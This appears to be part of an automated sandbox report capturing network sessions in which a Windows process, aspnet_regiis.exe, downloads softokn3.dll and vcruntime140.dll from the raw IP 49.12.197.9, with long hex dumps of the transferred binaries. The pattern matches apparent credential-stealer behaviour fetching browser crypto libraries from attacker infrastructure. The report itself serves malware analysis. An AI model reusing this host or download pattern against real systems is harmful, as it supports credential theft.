                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff
                                                                                                                                                                            Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45
                                                                                                                                                                            Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b
                                                                                                                                                                            Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc
                                                                                                                                                                            Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                                            Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                                                                            Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                                            Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                                            2024-10-03 01:27:06 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                                            Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            14192.168.2.94972549.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:08 UTC196OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:08 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:08 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:08 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:27:08 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                                                                            Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                                                                            Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                                                                            Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                                            Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                                            Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                                            Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                            Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                            Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                            2024-10-03 01:27:08 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                            Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            15192.168.2.94972649.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:09 UTC200OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:10 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:10 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:10 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:27:10 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
